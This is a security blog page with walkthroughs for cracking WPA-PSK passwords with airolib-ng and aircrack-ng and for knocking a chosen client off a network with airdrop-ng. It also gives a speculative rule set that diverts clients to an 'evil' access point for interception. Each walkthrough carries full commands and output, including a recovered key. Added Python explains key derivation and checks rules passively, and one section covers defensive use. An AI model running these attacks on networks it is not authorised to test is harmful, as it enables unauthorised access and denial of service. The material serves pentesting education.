Showing posts with label wireless.
Tuesday, January 18, 2011
WPA JTR/Pyrit/cowpatty uses and cracking interoperability
Below are a number of ways to interoperate between pyrit, cowpatty and JtR with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came across a rather standard WPA-PSK network. However, it came with issues that led to learning a bunch of new command-line usages for various tools in conjunction with one another.
Friday, February 19, 2010
Airolib-ng WPA cracking walk through
I used to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases from lists of SSIDs and passwords. Airolib stores these databases in SQLite3. This is convenient because you can have more than one SSID and password list in each database. If you are in an area with multiple SSIDs running WPA, you can note all of the SSIDs in a list and import them into the database. When doing a packet capture in an environment with multiple WPA-encrypted networks, the attacker can then crack any of the captured 4-way authentication handshakes with the same database file. Below is a play-by-play of cracking a WPA wireless network using the airolib/aircrack method.
Create SSID list:
Create Password List:
Clean Database:
Note: I assume you already have a packet capture of a handshake. If not, just run airodump-ng until you obtain one, or, for the sake of practice, turn your own client card off and on to catch a handshake while airodump-ng is running on that channel. I also assume you know the old way of cracking WPA; if not, I can post a guide on how to do that.
Setting up the databases:
First you need to create a SQLite3 database and import some SSIDs into it. If no database exists yet, airolib-ng will create one for you automatically. Create a list of SSIDs from your airodump-ng output, then run airolib-ng in the following format (database and list file names are placeholders):
airolib-ng <database> --import essid <ssidlist>
Create SSID list:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...
Writing...
Done.
Next, import your password list into the same database using the same format as for the SSIDs, but with the keyword passwd and your password list file. Here is the format, followed by an example.
airolib-ng <database> --import passwd <passwordlist>
Create Password List:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
Writing...
Done.
The next command, "clean", is optional: it runs integrity checks on the database and reduces its size where possible.
Clean Database:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.
Create your PMKs:
After you have imported all your SSIDs and passwords, you can create the PMK hashes with the following command.
root@ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.
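As an added example (not code from this post or from the aircrack-ng project), here is the derivation that the --batch step performs for every ESSID/password pair, written in Python with only the standard library. It shows why the table has to be keyed on ESSID: 802.11i uses the SSID as the PBKDF2 salt, so a PMK computed for one network name is useless against another, and a network with a unique SSID is not exposed to tables precomputed for common names. The "password"/"IEEE" vector is the one published in the 802.11i standard; the ficti0nAP table rows are constructed.

```python
import hashlib

# WPA/WPA2-Personal (802.11i): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key for one passphrase on one network.

    The SSID is the salt, which is exactly why airolib-ng stores PMKs per ESSID
    and why a table built for "linksys" says nothing about "ficti0nAP".
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def pmk_hex(passphrase: str, ssid: str) -> str:
    return wpa_pmk(passphrase, ssid).hex()


def pmk_table(ssids, passwords) -> dict:
    """What `airolib-ng --batch` materialises: one PMK per (ESSID, password) pair.

    Cost is len(ssids) * len(passwords) PBKDF2 runs, so the table grows linearly
    with every extra ESSID imported into the database.
    """
    return {(s, p): wpa_pmk(p, s) for s in ssids for p in passwords}


def salt_sensitivity(passphrase: str, ssid_a: str, ssid_b: str) -> int:
    """Count the bytes that differ between the PMKs of one passphrase on two SSIDs.

    For any change to the SSID this is close to all 32 bytes, i.e. there is no
    partial reuse of a PMK across networks.
    """
    a, b = wpa_pmk(passphrase, ssid_a), wpa_pmk(passphrase, ssid_b)
    return sum(x != y for x, y in zip(a, b))


if __name__ == "__main__":
    # 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print(pmk_hex("password", "IEEE"))
    # Constructed example mirroring the post's database: one ESSID x a few passwords
    table = pmk_table(["ficti0nAP"], ["MyPassword", "letmein", "changeme"])
    for (ssid, pw), pmk in table.items():
        print(f"{ssid:12} {pw:12} {pmk.hex()}")
    print("bytes differing after a 1-char SSID change:",
          salt_sensitivity("password", "IEEE", "IEEF"))
```

The 4096-iteration PBKDF2 is what makes --batch slow and what makes a precomputed table valuable; a defender gets the same protection the salt gives by not using a default or common SSID, and the protection the iteration count gives by using a long passphrase.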
Cracking:
Now that you have a database of PMK hashes for the WPA SSIDs in your area, you can run a crack against your capture file to retrieve the password. If all goes well and the network's password is in your database, you are done.
Example:
root@ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
# BSSID ESSID Encryption
1 00:18:F8:66:7E:CC ficti0nAP WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
Aircrack-ng 1.0 r1645
[00:00:00] 1 keys tested (240.91 k/s)
KEY FOUND! [ MyPassword ]
Master Key : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
Transient Key : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
EAPOL HMAC : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...
Optional:
Another useful option: if you want to crack all the WPA networks but give priority to a specific one, you can run the following SQL command against the database to set that priority for your network.
root@ficti0n:~# airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.
Monday, February 15, 2010
Airdrop-ng Basics on BT4 Final
De-Authentication and Client Manipulation
Over the last few days I have been playing with Airdrop-NG; it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these might be AP related, and it worked more consistently after installing psyco. Below are my notes on using Airdrop-ng along with the information from Schmoocon 2010. This tool should be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just basic usage; more advanced uses and coding projects to follow.
Description:
Airdrop-NG is a wireless de-authentication tool released at Schmoocon 2010 which can also double as a poor man's WIPS, depending on your intentions. It is a rule-based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using client station MACs, BSSIDs and a few other descriptors. Rules can be updated while the program is running in a loop, making for easy on-the-fly changes within your attack. On each loop Airdrop-NG re-parses the rules file and continues sending packets based on a CSV output from airodump-ng.
Below is a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against its BSSID. The install scripts and configuration are intuitive and quick to get working. I had zero install issues on BT4 Final; Pre-Final, however, did give me problems.
Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python install.py
Checking for dependancies used by the installer...
All dependancies installed! Continuing...
#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!
Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.
Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed! =)
Would you like to install lorcon? (y/n): y
Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may take a while...
A lorcon-old/rt2500inject.h
A lorcon-old/lorcon_decode.c
A lorcon-old/lorcon_packasm.h
A lorcon-old/tx80211_errno.h
A lorcon-old/Makefile.in
A lorcon-old/rt73inject.h
A lorcon-old/madwifing_control.c
..........................
.................................................
copying build/lib.linux-i686-2.5/pylorcon.so -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)
Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
python-psyco
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...
Setup Wireless Interface:
root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
5757 dhclient3
Interface Chipset Driver
wlan0 RTL8187 rtl8187 - [phy0]
(monitor mode enabled on mon0)
Switch to another shell and run airodump: (leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0
CH 6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:5B:6B:4E:6C:6F -1 26 1 0 11 54 . WEP WEP Testing
02:1F:28:65:AE:ED -24 489 391 0 1 54e WPA2 CCMP PSK ficti0nsAP
00:0B:85:6C:2D:4F -71 48 0 0 1 54 . WEP WEP Linksys
00:1B:85:6E:2D:4D -72 48 0 0 1 54 . WEP WEP
06:0B:85:6C:7D:4E -71 45 0 0 1 54 . OPN
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 02:16:08:AD:6E:95 -67 0 - 1 0 3
(not associated) 00:A0:F8:B8:DF:69 -73 0 - 1 120 39 Linksys
(not associated) 00:24:36:74:F1:97 -53 0 - 1 0 57
02:0B:65:4E:6C:62 02:17:6B:20:00:ED -72 0 - 1 124 27
02:1F:28:65:AE:ED 00:23:4E:DF:AE:70 0 54e- 1e 979 444
02:1F:28:65:AE:ED 00:21:00:DB:60:00 -28 0 - 1 67 91 ficti0nsAP
02:1F:28:65:AE:ED 00:21:6A:11:0E:52 -38 1e- 2e 0 212 ficti0nsAP
02:1F:28:65:AE:ED 00:2E:45:9F:87:AC -38 1e- 6e 0 194 ficti0nsAP
02:1F:28:65:AE:ED 00:23:3E:DF:ED:ED -42 54e- 1 0 63 ficti0nsAP
02:1F:28:65:AE:ED 00:25:08:AD:50:7C -51 54e-24 0 2
02:1F:28:65:AE:ED 00:1E:C2:C4:E5:79 -67 1e- 1 0 94 ficti0nsAP
Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients. I will explain a bit about the rules from the Schmoocon presentation, then we will add a rule to our rules.conf.
Rules are broken down into 3 fields (action/AP|clients):
2 options for state field:
-Allow
-Deny
5 options for AP field:
-ESSID
-BSSID
-Company OUI name value
-Company OUI numeric value
-any
5 options for clients field:
-mac
-multiple macs (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value
-any
Add your rule Example:
Below is a rule that denies all traffic to the client "01-23-5E-DF-AE-50" from the specified BSSID.
Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
Rule explanation:
d = deny (a would be allow)
/ = separates the action from the AP field, here the BSSID 02:1F:28:65:AE:ED
| = separates the AP field from the client field, here the station MAC 01-23-5E-DF-AE-50
Run airdrop with new rule: (Leave airodump running during this!!)
Now run Airdrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process. This will hopefully keep your victim from having network access.
root@ficti0n:~/# python airdrop-ng.py -b -i mon0 -t /root/Test-01.csv -r docs/dropRules.conf
#################################################
# Welcome to AirDrop-ng #
#################################################
Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid
Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops
Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid
Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops
Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid
.....................
...............................
Airdrop-ng will now exit
Sent 164 Packets
Exiting Program, Please take your card mon0 out of monitor mode
Poor Man’s WIPS:
Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.
Create a list of your station MAC's:
11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Create the list of your AP BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00
Rules:
Create a WIPS Rules file with the following rules
Allow 3 clients to talk to AB:AD:F2:14:00:00
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Allow 3 clients to talk to EA:CF:DF:AD:00:00
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Deny those 3 clients to any other access points
d/any|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
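An added example, not airdrop-ng's own code: a Python parser for the action/AP|clients rule format described above, plus a passive check of an airodump-ng CSV against a WIPS rule set, so you can see which station/AP associations a deny rule would fire on without transmitting anything. The allow-before-deny resolution is my assumption about how the WIPS rules above are meant to combine, not the tool's documented behaviour; the rules and CSV rows are constructed (the station MAC that appears twice in the post's list is replaced by two distinct ones), and only the BSSID/any and MAC-list/any field forms are handled, not the OUI-name forms from the talk.

```python
import re

MAC_RE = re.compile(r"^[0-9A-F]{2}(?::[0-9A-F]{2}){5}$")

# Constructed rules: the WIPS set from the post with two distinct station MACs.
RULES = """\
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66
d/any|11:22:33:44:55:66,21:2F:33:44:55:66
"""

# Constructed station section of an airodump-ng CSV (column order as written by
# --output-format csv; the rows themselves are made up for this example).
SAMPLE_CSV = """\
Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2010-02-15 18:20:01, 2010-02-15 18:30:00, -40, 120, AB:AD:F2:14:00:00,
21:2F:33:44:55:66, 2010-02-15 18:21:10, 2010-02-15 18:30:00, -55, 80, AB:CD:EF:12:34:56, FreeWifi
00:24:36:74:F1:97, 2010-02-15 18:22:00, 2010-02-15 18:30:00, -53, 57, (not associated),
"""


def norm_mac(mac: str) -> str:
    """Accept 01-23-5E-DF-AE-50 or 01:23:5e:df:ae:50 and return the upper-case colon
    form, which is how airdrop-ng echoes MACs back in its parsed-rule dict."""
    m = mac.strip().upper().replace("-", ":")
    if not MAC_RE.match(m):
        raise ValueError(f"not a MAC address: {mac!r}")
    return m


def parse_rule(line: str) -> dict:
    """Parse one action/ap|clients rule into the same dict shape airdrop-ng prints."""
    raw = line.strip()
    state, slash, rest = raw.partition("/")
    ap, bar, clients = rest.partition("|")
    if state not in ("a", "d") or not slash or not bar:
        raise ValueError(f"malformed rule: {raw!r}")
    return {
        "raw": raw,
        "state": state,
        "bssid": "any" if ap.strip().lower() == "any" else norm_mac(ap),
        "clients": "any" if clients.strip().lower() == "any"
                   else [norm_mac(c) for c in clients.split(",")],
    }


def load_rules(text: str) -> list:
    """Rules file: one rule per line, blank lines and #-comments ignored."""
    return [parse_rule(l) for l in text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]


def rule_matches(rule: dict, bssid: str, client: str) -> bool:
    ap_ok = rule["bssid"] in ("any", bssid)
    client_ok = rule["clients"] == "any" or client in rule["clients"]
    return ap_ok and client_ok


def verdict(rules: list, bssid: str, client: str) -> str:
    """Assumed resolution (not airdrop-ng's documented semantics): an allow match
    exempts the pair, otherwise any deny match flags it, otherwise 'unmatched'.
    Under this reading the post's WIPS rules (allow at the home APs, deny anywhere
    else) behave as intended."""
    if any(r["state"] == "a" and rule_matches(r, bssid, client) for r in rules):
        return "allow"
    if any(r["state"] == "d" and rule_matches(r, bssid, client) for r in rules):
        return "deny"
    return "unmatched"


def associations_from_csv(text: str) -> list:
    """Return (client, bssid) pairs from the station section of an airodump-ng CSV,
    skipping stations that are not associated to any AP."""
    pairs, in_stations = [], False
    for line in text.splitlines():
        if line.startswith("Station MAC"):
            in_stations = True
            continue
        if not in_stations or not line.strip():
            continue
        cols = [c.strip() for c in line.split(",")]
        if len(cols) < 6 or "not associated" in cols[5]:
            continue
        pairs.append((norm_mac(cols[0]), norm_mac(cols[5])))
    return pairs


def wips_report(rules_text: str, csv_text: str) -> list:
    """The (client, bssid) associations a deny rule would fire on: your stations
    that have wandered off to an AP that is not on the allow list."""
    rules = load_rules(rules_text)
    return [(c, b) for c, b in associations_from_csv(csv_text)
            if verdict(rules, b, c) == "deny"]


if __name__ == "__main__":
    print(parse_rule("d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50"))
    for client, bssid in wips_report(RULES, SAMPLE_CSV):
        print(f"ALERT: station {client} associated to non-whitelisted AP {bssid}")
```

Running the report against the constructed CSV flags only 21:2F:33:44:55:66, which has associated to AB:CD:EF:12:34:56 rather than one of the two allowed BSSIDs; the station at its home AP is exempted by the allow rule, and the unassociated station is ignored. Reviewing this list before enabling transmission is the cheap way to catch a typo in a rule (the post's own run shows a rule written for 01-23-5E-DF-AE-50 acting on 00:23:4E:DF:AE:70) before it de-authenticates the wrong station.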
MITM Attacks:
An attempted example from Schmoocon was an attack on clients via MITM. This example wasn't shown during the demo because the presenters couldn't get their monitors working correctly, but I imagine the ruleset would deny all clients access to the legitimate BSSIDs within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules, which I am guessing would go something like the following. I could be way off, but this should function similarly to what I think they were going to show us.
Make a list of local BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00
FON MAC:
AB:CD:EF:12:34:56
Add In some new rules:
Deny 3 clients to talk to AB:AD:F2:14:00:00
d/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Deny 3 clients to talk to EA:CF:DF:AD:00:00
d/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
Allow Access to my evil AP's:
a/AB:CD:EF:12:34:56|any
I have a couple of other ideas for IDS monitoring combining other tools, and also some malicious MITM I am messing around with, that I will cover in future posts. So far Airdrop-ng is a fun tool. Enjoy.
--Ficti0n